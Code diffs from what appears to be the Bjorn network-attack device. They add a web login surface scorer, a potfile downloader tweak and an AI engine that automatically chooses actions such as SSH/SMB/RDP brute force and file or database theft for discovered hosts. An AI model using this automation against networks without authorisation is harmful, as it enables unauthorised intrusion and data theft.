if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
)
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
if signals.get("looks_like_login") or signals.get("auth_type"):
found_login += 1
headers_payload = {
"signals": signals,
"sample": {
"status": status,
"content_type": ctype,
},
}
try:
headers_json = json.dumps(headers_payload, ensure_ascii=True)
except Exception:
headers_json = ""
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
method="GET",
user_agent=user_agent,
headers_json=headers_json,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
progress.set_complete()
# "success" means: profiler ran; not that a login exists.
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""


@@ -0,0 +1,233 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
from recent webenum rows written by tool='login_profiler'.
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import time
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_surface_mapper.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebSurfaceMapper"
b_module = "web_surface_mapper"
b_status = "WebSurfaceMapper"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_success:WebLoginProfiler"
b_priority = 45
b_action = "normal"
b_cooldown = 600
b_rate_limit = "48/86400"
b_enabled = 1
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _safe_json_loads(s: str) -> dict:
try:
return json.loads(s) if s else {}
except Exception:
return {}
def _score_signals(signals: dict) -> int:
"""
Heuristic risk score 0..100.
This is not an "attack recommendation"; it's a prioritization for recon.
"""
if not isinstance(signals, dict):
return 0
score = 0
auth = str(signals.get("auth_type") or "").lower()
if auth in {"basic", "digest"}:
score += 45
if bool(signals.get("looks_like_login")):
score += 35
if bool(signals.get("has_csrf")):
score += 10
if bool(signals.get("rate_limited_hint")):
# Defensive signal: reduces priority for noisy follow-ups.
score -= 25
hints = signals.get("framework_hints") or []
if isinstance(hints, list) and hints:
score += min(10, 3 * len(hints))
return max(0, min(100, int(score)))
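Under the weights in `_score_signals`, a Basic-auth login page with CSRF markers and two framework hints lands near the top of the 0..100 range, while a rate-limited page drops sharply. A condensed standalone copy for a quick check (signal dicts are illustrative):

```python
def score(signals: dict) -> int:
    # Condensed copy of _score_signals above, for a standalone check.
    s = 0
    if str(signals.get("auth_type") or "").lower() in {"basic", "digest"}:
        s += 45
    if signals.get("looks_like_login"):
        s += 35
    if signals.get("has_csrf"):
        s += 10
    if signals.get("rate_limited_hint"):
        s -= 25  # defensive signal lowers priority
    hints = signals.get("framework_hints") or []
    if isinstance(hints, list) and hints:
        s += min(10, 3 * len(hints))
    return max(0, min(100, s))

print(score({"auth_type": "basic", "looks_like_login": True,
             "has_csrf": True, "framework_hints": ["django", "php"]}))  # 96
print(score({"looks_like_login": True, "rate_limited_hint": True}))    # 10
```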
class WebSurfaceMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
def _db_upsert_summary(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
scheme: str,
summary: dict,
):
directory = "/__surface_summary__"
payload = json.dumps(summary, ensure_ascii=True)
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'surface_mapper', 'SUMMARY', '', ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
directory,
200,
len(payload),
0,
"application/json",
payload,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
try:
port_i = int(port) if str(port).strip() else 80
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
self.shared_data.bjorn_orch_status = "WebSurfaceMapper"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "phase": "score"}
# Load recent profiler rows for this target.
rows: List[Dict[str, Any]] = []
try:
rows = self.shared_data.db.query(
"""
SELECT directory, status, content_type, headers, response_time, last_seen
FROM webenum
WHERE mac_address=? AND ip=? AND port=? AND is_active=1 AND tool='login_profiler'
ORDER BY last_seen DESC
""",
(mac or "", ip, int(port_i)),
)
except Exception as e:
logger.error(f"DB query failed (webenum login_profiler): {e}")
rows = []
progress = ProgressTracker(self.shared_data, max(1, len(rows)))
scored: List[Tuple[int, str, int, str, dict]] = []
try:
for r in rows:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
directory = str(r.get("directory") or "/")
status = int(r.get("status") or 0)
ctype = str(r.get("content_type") or "")
h = _safe_json_loads(str(r.get("headers") or ""))
signals = h.get("signals") if isinstance(h, dict) else {}
score = _score_signals(signals if isinstance(signals, dict) else {})
scored.append((score, directory, status, ctype, signals if isinstance(signals, dict) else {}))
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": directory,
"score": str(score),
}
progress.advance(1)
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)
top = scored[:5]
avg = int(sum(s for s, *_ in scored) / max(1, len(scored))) if scored else 0
top_path = top[0][1] if top else ""
top_score = top[0][0] if top else 0
summary = {
"ip": ip,
"port": int(port_i),
"scheme": scheme,
"count_profiled": int(len(rows)),
"avg_score": int(avg),
"top": [
{"score": int(s), "path": p, "status": int(st), "content_type": ct, "signals": sig}
for (s, p, st, ct, sig) in top
],
"ts_epoch": int(time.time()),
}
try:
self._db_upsert_summary(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
scheme=scheme,
summary=summary,
)
except Exception as e:
logger.error(f"DB upsert summary failed: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"count": str(len(rows)),
"top_path": top_path,
"top_score": str(top_score),
"avg_score": str(avg),
}
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
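`execute()` ranks profiled paths with `scored.sort(key=lambda t: (t[0], t[2]), reverse=True)`, so ties on score are broken by the higher HTTP status (a 401 outranks a 200 at equal score). A standalone check with made-up rows:

```python
# (score, path, status, content_type, signals) rows, shaped like `scored` in execute().
scored = [
    (96, "/admin", 200, "text/html", {}),
    (10, "/login", 200, "text/html", {}),
    (96, "/manager", 401, "text/html", {}),
]
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)  # score desc, then status desc
top = [path for _, path, *_ in scored[:2]]
print(top)  # ['/manager', '/admin']
```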


@@ -8,6 +8,7 @@ import argparse
 import requests
 import subprocess
 from datetime import datetime
+import logging
 # ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
@@ -172,8 +173,9 @@ class WPAsecPotfileManager:
 response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
 response.raise_for_status()
-timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
-filename = os.path.join(save_dir, f"potfile_{timestamp}.pot")
+ts = datetime.now().strftime("%Y%m%d_%H%M%S")
+filename = os.path.join(save_dir, f"potfile_{ts}.pot")
 os.makedirs(save_dir, exist_ok=True)
 with open(filename, "wb") as file:
File diff suppressed because it is too large

ai_engine.py (new file, 867 lines)

@@ -0,0 +1,867 @@
"""
ai_engine.py - Dynamic AI Decision Engine for Bjorn
═══════════════════════════════════════════════════════════════════════════
Purpose:
Lightweight AI decision engine for Raspberry Pi Zero.
Works in tandem with deep learning model trained on external PC.
Architecture:
- Lightweight inference engine (no TensorFlow/PyTorch on Pi)
- Loads pre-trained model weights from PC
- Real-time action selection
- Automatic feature extraction
- Fallback to heuristics when model unavailable
Model Pipeline:
1. Pi: Collect data → Export → Transfer to PC
2. PC: Train deep neural network → Export lightweight model
3. Pi: Load model → Use for decision making
4. Repeat: Continuous learning cycle
Author: Bjorn Team
Version: 2.0.0
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional, Tuple
from pathlib import Path
from logger import Logger
logger = Logger(name="ai_engine.py", level=20)
class BjornAIEngine:
"""
Dynamic AI engine for action selection and prioritization.
Uses pre-trained model from external PC or falls back to heuristics.
"""
def __init__(self, shared_data, model_dir: str = None):
"""
Initialize AI engine
"""
self.shared_data = shared_data
self.db = shared_data.db
if model_dir is None:
self.model_dir = Path(getattr(shared_data, 'ai_models_dir', '/home/bjorn/ai_models'))
else:
self.model_dir = Path(model_dir)
self.model_dir.mkdir(parents=True, exist_ok=True)
# Model state
self.model_loaded = False
self.model_weights = None
self.model_config = None
self.feature_config = None
self.last_server_attempted = False
self.last_server_contact_ok = None
# Try to load latest model
self._load_latest_model()
# Fallback heuristics (always available)
self._init_heuristics()
logger.info(
f"AI Engine initialized (model_loaded={self.model_loaded}, "
f"heuristics_available=True)"
)
# ═══════════════════════════════════════════════════════════════════════
# MODEL LOADING
# ═══════════════════════════════════════════════════════════════════════
def _load_latest_model(self):
"""Load the most recent model from model directory"""
try:
# Find all potential model configs
all_json_files = [f for f in self.model_dir.glob("bjorn_model_*.json")
if "_weights.json" not in f.name]
# 1. Filter for files that have matching weights
valid_models = []
for f in all_json_files:
weights_path = f.with_name(f.stem + '_weights.json')
if weights_path.exists():
valid_models.append(f)
else:
logger.debug(f"Skipping model {f.name}: Weights file missing")
if not valid_models:
logger.info(f"No complete models found in {self.model_dir}. Checking server...")
# Try to download from server
if self.check_for_updates():
return
logger.info_throttled(
"No AI model available (server offline or empty). Using heuristics only.",
key="ai_no_model_available",
interval_s=600.0,
)
return
# 2. Sort by timestamp in filename (lexicographical) and pick latest
latest_model = sorted(valid_models)[-1]
weights_file = latest_model.with_name(latest_model.stem + '_weights.json')
logger.info(f"Loading model: {latest_model.name} (Weights exists!)")
with open(latest_model, 'r') as f:
model_data = json.load(f)
self.model_config = model_data.get('config', model_data)
self.feature_config = model_data.get('features', {})
# Load weights
with open(weights_file, 'r') as f:
weights_data = json.load(f)
self.model_weights = {
k: np.array(v) for k, v in weights_data.items()
}
del weights_data # Free raw dict — numpy arrays are the canonical form
self.model_loaded = True
logger.success(
f"Model loaded successfully: {self.model_config.get('version', 'unknown')}"
)
except Exception as e:
logger.error(f"Failed to load model: {e}")
import traceback
logger.debug(traceback.format_exc())
self.model_loaded = False
def reload_model(self) -> bool:
"""Reload model from disk"""
logger.info("Reloading AI model...")
self.model_loaded = False
self.model_weights = None
self.model_config = None
self.feature_config = None
self._load_latest_model()
return self.model_loaded
def check_for_updates(self) -> bool:
"""Check AI Server for new model version."""
self.last_server_attempted = False
self.last_server_contact_ok = None
try:
import requests
import os
except ImportError:
return False
url = self.shared_data.config.get("ai_server_url")
if not url:
return False
try:
logger.debug(f"Checking AI Server for updates at {url}/model/latest")
from ai_utils import get_system_mac
params = {'mac_addr': get_system_mac()}
self.last_server_attempted = True
resp = requests.get(f"{url}/model/latest", params=params, timeout=5)
# Any HTTP response means server is reachable.
self.last_server_contact_ok = True
if resp.status_code != 200:
return False
remote_config = resp.json()
remote_version = str(remote_config.get("version", "")).strip()
if not remote_version:
return False
current_version = str(self.model_config.get("version", "0")).strip() if self.model_config else "0"
# NOTE: string comparison; assumes sortable (e.g. timestamp-style) version strings.
if remote_version > current_version:
logger.info(f"New model available: {remote_version} (Local: {current_version})")
# Download config (stream to avoid loading the whole file into RAM)
r_conf = requests.get(
f"{url}/model/download/bjorn_model_{remote_version}.json",
stream=True, timeout=15,
)
if r_conf.status_code == 200:
conf_path = self.model_dir / f"bjorn_model_{remote_version}.json"
with open(conf_path, 'wb') as f:
for chunk in r_conf.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
os.fsync(f.fileno())
else:
logger.info_throttled(
f"AI model download skipped (config HTTP {r_conf.status_code})",
key=f"ai_model_dl_conf_{r_conf.status_code}",
interval_s=300.0,
)
return False
# Download weights (stream to avoid loading the whole file into RAM)
r_weights = requests.get(
f"{url}/model/download/bjorn_model_{remote_version}_weights.json",
stream=True, timeout=30,
)
if r_weights.status_code == 200:
weights_path = self.model_dir / f"bjorn_model_{remote_version}_weights.json"
with open(weights_path, 'wb') as f:
for chunk in r_weights.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
os.fsync(f.fileno())
logger.success(f"Downloaded model {remote_version} files to Pi.")
else:
logger.info_throttled(
f"AI model download skipped (weights HTTP {r_weights.status_code})",
key=f"ai_model_dl_weights_{r_weights.status_code}",
interval_s=300.0,
)
return False
# Reload explicitly
return self.reload_model()
logger.debug(f"Server model ({remote_version}) is not newer than local ({current_version})")
return False
except Exception as e:
self.last_server_attempted = True
self.last_server_contact_ok = False
# Server may be offline; avoid spamming errors in AI mode.
logger.info_throttled(
f"AI server unavailable for model update check: {e}",
key="ai_model_update_check_failed",
interval_s=300.0,
)
return False
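The update check above compares version strings lexicographically, and the model loader sorts filenames the same way. That is safe for timestamp-style version strings but would misorder dotted semvers:

```python
# Timestamp-style versions sort correctly as strings:
print("20260218_2200" > "20260124_1800")  # True

# Dotted semvers do not:
print("2.10" > "2.9")  # False: compared character by character, '1' < '9'
```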
# ═══════════════════════════════════════════════════════════════════════
# DECISION MAKING
# ═══════════════════════════════════════════════════════════════════════
def choose_action(
self,
host_context: Dict[str, Any],
available_actions: List[str],
exploration_rate: float = None
) -> Tuple[str, float, Dict[str, Any]]:
"""
Choose the best action for a given host.
Args:
host_context: Dict with host information (mac, ports, hostname, etc.)
available_actions: List of action names that can be executed
exploration_rate: Probability of random exploration (0.0-1.0)
Returns:
Tuple of (action_name, confidence_score, debug_info)
"""
if exploration_rate is None:
exploration_rate = float(getattr(self.shared_data, "ai_exploration_rate", 0.1))
try:
# Exploration: random action
if exploration_rate > 0 and np.random.random() < exploration_rate:
import random
action = random.choice(available_actions)
return action, 0.0, {'method': 'exploration', 'exploration_rate': exploration_rate}
# If model is loaded, use it for prediction
if self.model_loaded and self.model_weights:
return self._predict_with_model(host_context, available_actions)
# Fallback to heuristics
return self._predict_with_heuristics(host_context, available_actions)
except Exception as e:
logger.error(f"Error choosing action: {e}")
# Ultimate fallback: first available action
if available_actions:
return available_actions[0], 0.0, {'method': 'fallback_error', 'error': str(e)}
return None, 0.0, {'method': 'no_actions', 'error': 'No available actions'}
def _predict_with_model(
self,
host_context: Dict[str, Any],
available_actions: List[str]
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use loaded neural network model for prediction.
Dynamically maps extracted features to model manifest.
"""
try:
from ai_utils import extract_neural_features_dict
# 1. Get model feature manifest
manifest = self.model_config.get('architecture', {}).get('feature_names', [])
if not manifest:
# Legacy fallback
return self._predict_with_model_legacy(host_context, available_actions)
# 2. Extract host-level features
mac = host_context.get('mac', '')
host = self.db.get_host_by_mac(mac) if mac else {}
host_data = self._get_host_context_from_db(mac, host)
net_data = self._get_network_context()
temp_data_base = self._get_temporal_context(mac) # MAC-level temporal, called once
best_action = None
best_score = -1.0
all_scores = {}
# 3. Score each action
for action in available_actions:
action_data = self._get_action_context(action, host, mac)
# Merge action-level temporal overrides into temporal context copy
temp_data = dict(temp_data_base)
temp_data['same_action_attempts'] = action_data.pop('same_action_attempts', 0)
temp_data['is_retry'] = action_data.pop('is_retry', False)
# Extract all known features into a dict
features_dict = extract_neural_features_dict(
host_features=host_data,
network_features=net_data,
temporal_features=temp_data,
action_features=action_data
)
# Dynamic mapping: Pull features requested by model manifest
# Defaults to 0.0 if the Pi doesn't know this feature yet
input_vector = np.array([float(features_dict.get(name, 0.0)) for name in manifest], dtype=float)
# Neural inference (supports variable hidden depth from exported model).
z_out = self._forward_network(input_vector)
z_out = np.array(z_out).reshape(-1)
if z_out.size == 1:
# Binary classifier exported with 1-neuron sigmoid output.
score = float(self._sigmoid(z_out[0]))
else:
probs = self._softmax(z_out)
score = float(probs[1] if len(probs) > 1 else probs[0])
all_scores[action] = score
if score > best_score:
best_score = score
best_action = action
if best_action is None:
return self._predict_with_heuristics(host_context, available_actions)
# Capture an input vector for visualization. After the loop this is the
# vector of the last action scored, not necessarily best_action; vectors
# differ only in action-specific fields, so it is adequate for debugging.
debug_info = {
'method': 'neural_network_v3',
'model_version': self.model_config.get('version'),
'feature_count': len(manifest),
'all_scores': all_scores,
# Convert numpy ndarray → plain Python list so debug_info is
# always JSON-serialisable (scheduler stores it in action_queue metadata).
'input_vector': input_vector.tolist(),
}
return best_action, float(best_score), debug_info
except Exception as e:
logger.error(f"Dynamic model prediction failed: {e}")
import traceback
logger.debug(traceback.format_exc())
return self._predict_with_heuristics(host_context, available_actions)
def _predict_with_model_legacy(self, host_context: Dict[str, Any], available_actions: List[str]) -> Tuple[str, float, Dict[str, Any]]:
"""Fallback for models without feature_names manifest (fixed length 56)"""
# ... very similar to previous v2 but using hardcoded list ...
return self._predict_with_heuristics(host_context, available_actions)
def _get_host_context_from_db(self, mac: str, host: Dict) -> Dict:
"""Helper to collect host features from DB"""
ports_str = host.get('ports', '') or ''
ports = [int(p) for p in ports_str.split(';') if p.strip().isdigit()]
vendor = host.get('vendor', '')
# Calculate age
age_hours = 0.0
if host.get('first_seen'):
from datetime import datetime
try:
ts = host['first_seen']
first_seen = datetime.fromisoformat(ts) if isinstance(ts, str) else ts
age_hours = (datetime.now() - first_seen).total_seconds() / 3600
except Exception: pass
creds = self._get_credentials_for_host(mac)
return {
'port_count': len(ports),
'service_count': len(self._get_services_for_host(mac)),
'ip_count': len((host.get('ips') or '').split(';')),
'credential_count': len(creds),
'age_hours': round(age_hours, 2),
'has_ssh': 22 in ports,
'has_http': 80 in ports or 8080 in ports,
'has_https': 443 in ports,
'has_smb': 445 in ports,
'has_rdp': 3389 in ports,
'has_database': any(p in ports for p in [3306, 5432, 1433]),
'has_credentials': len(creds) > 0,
'is_new': age_hours < 24,
'is_private': True, # Simple assumption for now
'has_multiple_ips': len((host.get('ips') or '').split(';')) > 1,
'vendor_category': self._categorize_vendor(vendor),
'port_profile': self._detect_port_profile(ports)
}
def _get_network_context(self) -> Dict:
"""Collect real network-wide stats from DB (called once per choose_action)."""
try:
all_hosts = self.db.get_all_hosts()
total = len(all_hosts)
# Subnet diversity
subnets = set()
active = 0
for h in all_hosts:
ips = (h.get('ips') or '').split(';')
for ip in ips:
ip = ip.strip()
if ip:
subnets.add('.'.join(ip.split('.')[:3]))
break
if h.get('alive'):
active += 1
return {
'total_hosts': total,
'subnet_count': len(subnets),
'similar_vendor_count': 0, # filled by caller if needed
'similar_port_profile_count': 0, # filled by caller if needed
'active_host_ratio': round(active / total, 2) if total else 0.0,
}
except Exception as e:
logger.error(f"Error collecting network context: {e}")
return {
'total_hosts': 0, 'subnet_count': 1,
'similar_vendor_count': 0, 'similar_port_profile_count': 0,
'active_host_ratio': 1.0,
}
def _get_temporal_context(self, mac: str) -> Dict:
"""
Collect real temporal features for a MAC from DB.
same_action_attempts / is_retry are action-specific — they are NOT
included here; instead they are merged from _get_action_context()
inside the per-action loop in _predict_with_model().
"""
from datetime import datetime
now = datetime.now()
ctx = {
'hour_of_day': now.hour,
'day_of_week': now.weekday(),
'is_weekend': now.weekday() >= 5,
'is_night': now.hour < 6 or now.hour >= 22,
'previous_action_count': 0,
'seconds_since_last': 0,
'historical_success_rate': 0.0,
'same_action_attempts': 0, # placeholder; overwritten per-action
'is_retry': False, # placeholder; overwritten per-action
'global_success_rate': 0.0,
'hours_since_discovery': 0,
}
try:
# Per-host stats from ml_features (persistent training log)
rows = self.db.query(
"""
SELECT
COUNT(*) AS cnt,
AVG(CAST(success AS REAL)) AS success_rate,
MAX(timestamp) AS last_ts
FROM ml_features
WHERE mac_address = ?
""",
(mac,),
)
if rows and rows[0]['cnt']:
ctx['previous_action_count'] = int(rows[0]['cnt'])
ctx['historical_success_rate'] = round(float(rows[0]['success_rate'] or 0.0), 2)
if rows[0]['last_ts']:
try:
last_dt = datetime.fromisoformat(str(rows[0]['last_ts']))
ctx['seconds_since_last'] = round(
(now - last_dt).total_seconds(), 1
)
except Exception:
pass
# Global success rate (all hosts)
g = self.db.query(
"SELECT AVG(CAST(success AS REAL)) AS gsr FROM ml_features"
)
if g and g[0]['gsr'] is not None:
ctx['global_success_rate'] = round(float(g[0]['gsr']), 2)
# Hours since host first seen
host = self.db.get_host_by_mac(mac)
if host and host.get('first_seen'):
try:
ts = host['first_seen']
first_seen = datetime.fromisoformat(ts) if isinstance(ts, str) else ts
ctx['hours_since_discovery'] = round(
(now - first_seen).total_seconds() / 3600, 1
)
except Exception:
pass
except Exception as e:
logger.error(f"Error collecting temporal context for {mac}: {e}")
return ctx
# Action-specific temporal fields populated by _get_action_context
_ACTION_PORTS = {
'SSHBruteforce': 22, 'SSHEnumeration': 22, 'StealFilesSSH': 22,
'WebEnumeration': 80, 'WebVulnScan': 80, 'WebLoginProfiler': 80,
'WebSurfaceMapper': 80,
'SMBBruteforce': 445, 'StealFilesSMB': 445,
'FTPBruteforce': 21, 'StealFilesFTP': 21,
'TelnetBruteforce': 23, 'StealFilesTelnet': 23,
'SQLBruteforce': 3306, 'StealDataSQL': 3306,
'NmapVulnScanner': 0, 'NetworkScanner': 0,
'RDPBruteforce': 3389,
}
def _get_action_context(self, action_name: str, host: Dict, mac: str = '') -> Dict:
"""
Collect action-specific features including per-action attempt history.
Merges action-type + target-port info with action-level temporal stats.
"""
action_type = self._classify_action_type(action_name)
target_port = self._ACTION_PORTS.get(action_name, 0)
# If port not in lookup, try to infer from action name
if target_port == 0:
name_lower = action_name.lower()
for svc, port in [('ssh', 22), ('http', 80), ('smb', 445), ('ftp', 21),
('telnet', 23), ('sql', 3306), ('rdp', 3389)]:
if svc in name_lower:
target_port = port
break
ctx = {
'action_type': action_type,
'target_port': target_port,
'is_standard_port': 0 < target_port < 1024,
# Action-level temporal (overrides placeholder in temporal_context)
'same_action_attempts': 0,
'is_retry': False,
}
if mac:
try:
r = self.db.query(
"""
SELECT COUNT(*) AS cnt
FROM ml_features
WHERE mac_address = ? AND action_name = ?
""",
(mac, action_name),
)
attempts = int(r[0]['cnt']) if r else 0
ctx['same_action_attempts'] = attempts
ctx['is_retry'] = attempts > 0
except Exception as e:
logger.debug(f"Action context DB query failed for {action_name}: {e}")
return ctx
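When an action is missing from `_ACTION_PORTS`, the fallback infers the port from service substrings in the action name. A standalone mirror of that loop (the probe names are hypothetical):

```python
def infer_port(action_name: str) -> int:
    # Mirrors the substring fallback in _get_action_context (lookup table omitted).
    for svc, port in [('ssh', 22), ('http', 80), ('smb', 445), ('ftp', 21),
                      ('telnet', 23), ('sql', 3306), ('rdp', 3389)]:
        if svc in action_name.lower():
            return port
    return 0

print(infer_port("CustomHttpProbe"))  # 80
print(infer_port("ZigbeeSniffer"))    # 0 (no known service substring)
```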
def _classify_action_type(self, action_name: str) -> str:
"""Classify action name into a type"""
name = action_name.lower()
if 'brute' in name: return 'bruteforce'
if 'enum' in name or 'scan' in name: return 'enumeration'
if 'exploit' in name: return 'exploitation'
if 'dump' in name or 'extract' in name: return 'extraction'
return 'other'
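The substring rules in `_classify_action_type` are order-sensitive ('brute' is checked before 'enum'/'scan'). A standalone mirror with sample action names:

```python
def classify(name: str) -> str:
    # Mirrors _classify_action_type above; check order matters.
    n = name.lower()
    if 'brute' in n: return 'bruteforce'
    if 'enum' in n or 'scan' in n: return 'enumeration'
    if 'exploit' in n: return 'exploitation'
    if 'dump' in n or 'extract' in n: return 'extraction'
    return 'other'

print(classify("SSHBruteforce"))    # bruteforce
print(classify("NmapVulnScanner"))  # enumeration ('scan' matches)
print(classify("StealFilesSMB"))    # other (no rule matches 'steal')
```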
# ═══════════════════════════════════════════════════════════════════════
# HEURISTIC FALLBACK
# ═══════════════════════════════════════════════════════════════════════
def _init_heuristics(self):
"""Initialize rule-based heuristics for cold start"""
self.heuristics = {
'port_based': {
22: ['SSHBruteforce', 'SSHEnumeration'],
80: ['WebEnumeration', 'WebVulnScan'],
443: ['WebEnumeration', 'SSLScan'],
445: ['SMBBruteforce', 'SMBEnumeration'],
3389: ['RDPBruteforce'],
21: ['FTPBruteforce', 'FTPEnumeration'],
23: ['TelnetBruteforce'],
3306: ['MySQLBruteforce'],
5432: ['PostgresBruteforce'],
1433: ['MSSQLBruteforce']
},
'service_based': {
'ssh': ['SSHBruteforce', 'SSHEnumeration'],
'http': ['WebEnumeration', 'WebVulnScan'],
'https': ['WebEnumeration', 'SSLScan'],
'smb': ['SMBBruteforce', 'SMBEnumeration'],
'ftp': ['FTPBruteforce', 'FTPEnumeration'],
'mysql': ['MySQLBruteforce'],
'postgres': ['PostgresBruteforce']
},
'profile_based': {
'camera': ['WebEnumeration', 'DefaultCredCheck', 'RTSPBruteforce'],
'nas': ['SMBBruteforce', 'WebEnumeration', 'SSHBruteforce'],
'web_server': ['WebEnumeration', 'WebVulnScan'],
'database': ['MySQLBruteforce', 'PostgresBruteforce'],
'linux_server': ['SSHBruteforce', 'WebEnumeration'],
'windows_server': ['SMBBruteforce', 'RDPBruteforce']
}
}
def _predict_with_heuristics(
self,
host_context: Dict[str, Any],
available_actions: List[str]
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use rule-based heuristics for action selection.
Provides decent performance without machine learning.
"""
try:
mac = host_context.get('mac', '')
host = self.db.get_host_by_mac(mac) if mac else {}
# Get ports and services
ports_str = host.get('ports', '') or ''
ports = {int(p) for p in ports_str.split(';') if p.strip().isdigit()}
services = self._get_services_for_host(mac)
# Detect port profile
port_profile = self._detect_port_profile(ports)
# Scoring system
action_scores = {action: 0.0 for action in available_actions}
# Score based on ports
for port in ports:
if port in self.heuristics['port_based']:
for action in self.heuristics['port_based'][port]:
if action in action_scores:
action_scores[action] += 0.3
# Score based on services
for service in services:
if service in self.heuristics['service_based']:
for action in self.heuristics['service_based'][service]:
if action in action_scores:
action_scores[action] += 0.4
# Score based on port profile
if port_profile in self.heuristics['profile_based']:
for action in self.heuristics['profile_based'][port_profile]:
if action in action_scores:
action_scores[action] += 0.3
# Find best action
if action_scores:
best_action = max(action_scores, key=action_scores.get)
best_score = action_scores[best_action]
# Clamp score to 0-1
if best_score > 0:
best_score = min(best_score, 1.0)
debug_info = {
'method': 'heuristics',
'port_profile': port_profile,
'ports': list(ports)[:10],
'services': services,
'all_scores': {k: v for k, v in action_scores.items() if v > 0}
}
return best_action, best_score, debug_info
# Ultimate fallback
if available_actions:
return available_actions[0], 0.1, {'method': 'fallback_first'}
return None, 0.0, {'method': 'no_actions'}
except Exception as e:
logger.error(f"Heuristic prediction failed: {e}")
if available_actions:
return available_actions[0], 0.0, {'method': 'fallback_error', 'error': str(e)}
return None, 0.0, {'method': 'error', 'error': str(e)}
# ═══════════════════════════════════════════════════════════════════════
# HELPER METHODS
# ═══════════════════════════════════════════════════════════════════════
@staticmethod
def _relu(x):
"""ReLU activation function"""
return np.maximum(0, x)
@staticmethod
def _sigmoid(x):
"""Sigmoid activation function"""
return 1.0 / (1.0 + np.exp(-x))
@staticmethod
def _softmax(x):
"""Softmax activation function"""
exp_x = np.exp(x - np.max(x)) # Numerical stability
return exp_x / exp_x.sum()
def _forward_network(self, input_vector: np.ndarray) -> np.ndarray:
"""
Forward pass through exported dense network with dynamic hidden depth.
Expected keys: w1/b1, w2/b2, ..., w_out/b_out
"""
a = input_vector
layer_idx = 1
while f'w{layer_idx}' in self.model_weights:
w = self.model_weights[f'w{layer_idx}']
b = self.model_weights[f'b{layer_idx}']
a = self._relu(np.dot(a, w) + b)
layer_idx += 1
return np.dot(a, self.model_weights['w_out']) + self.model_weights['b_out']
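The dynamic-depth loop above walks `w1/b1`, `w2/b2`, … until a key is missing, then applies the output layer. A minimal standalone sketch of the same walk, with toy weights (the `forward`/`relu` names here are illustrative, not the class methods):

```python
import numpy as np

def relu(x):
    return np.maximum(0, x)

def forward(weights: dict, x: np.ndarray) -> np.ndarray:
    # Walk w1/b1, w2/b2, ... until the next key is absent, then apply
    # w_out/b_out -- the same convention as the exported dense network.
    a = x
    i = 1
    while f'w{i}' in weights:
        a = relu(a @ weights[f'w{i}'] + weights[f'b{i}'])
        i += 1
    return a @ weights['w_out'] + weights['b_out']
```

Adding a `w2/b2` pair deepens the network without any code change, which is the point of the key-probing convention.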
def _get_services_for_host(self, mac: str) -> List[str]:
"""Get detected services for host"""
try:
results = self.db.query("""
SELECT DISTINCT service
FROM port_services
WHERE mac_address=?
""", (mac,))
